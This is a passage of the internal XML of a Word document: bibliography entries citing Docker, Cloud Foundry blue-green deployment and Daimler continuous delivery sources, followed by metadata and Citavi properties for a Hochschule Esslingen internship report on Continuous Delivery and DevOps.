    <b:URL>https://docs.docker.com/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Clo17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{225574A6-9E62-4C90-ACEF-47B4BC3B043B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Cloud Foundry</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Cloud Foundry Documentation</b:Title>
    <b:InternetSiteTitle>Using Blue-Green Deployment to Reduce Downtime and Risk </b:InternetSiteTitle>
    <b:Year>2017</b:Year>
    <b:Month>02</b:Month>
    <b:Day>27</b:Day>
    <b:YearAccessed>2017</b:YearAccessed>
    <b:MonthAccessed>09</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://docs.cloudfoundry.org/devguide/deploy-apps/blue-green.html</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Dai17</b:Tag>
    <b:SourceType>ElectronicSource</b:SourceType>
    <b:Guid>{EBA4D38A-BE47-426D-A862-CE67B35670F8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Daimler AG</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Continuous Delivery</b:Title>
    <b:Medium>Power Point Präsentation</b:Medium>
    <b:Year>2017</b:Year>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AF200C1C-AD51-4DB9-B7E3-79B058A7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9</Words>
  <Characters>19025</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Continuous Delivery und der DevOps Ansatz</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Hochschule Essslingen - University of Applied Sciences</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elivery und der DevOps Ansatz</dc:title>
  <dc:creator>Jan Binder</dc:creator>
  <cp:keywords>Praxissemesterbericht, Hochschule Esslingen, Daimler AG, DevOps, Continuous De-livery, Softwareentwicklung</cp:keywords>
  <cp:lastModifiedBy>Jan Binder</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2019-02-07T18:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-07T18:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-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_vorlage_HSE_Citavi</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="CitaviDocumentProperty_6">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="CitaviDocumentProperty_0">
    <vt:lpwstr>99fe8bb6-35d6-4f81-b1c0-ff02c3ce2e0c</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CitaviDocumentProperty_1">
    <vt:lpwstr>5.0.0.11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="CitaviDocumentProperty_8">
    <vt:lpwstr>C:\Users\adr\05-Hochschule\0505-ModuleVorlesungen\A_04_TechnischeDokumentation_IngMeth\Material\SoftwareEngineering.Citavi\SoftwareEngineering\SoftwareEngineering.ctv5</vt:lpwstr>
  </property>
</Properties>
</file>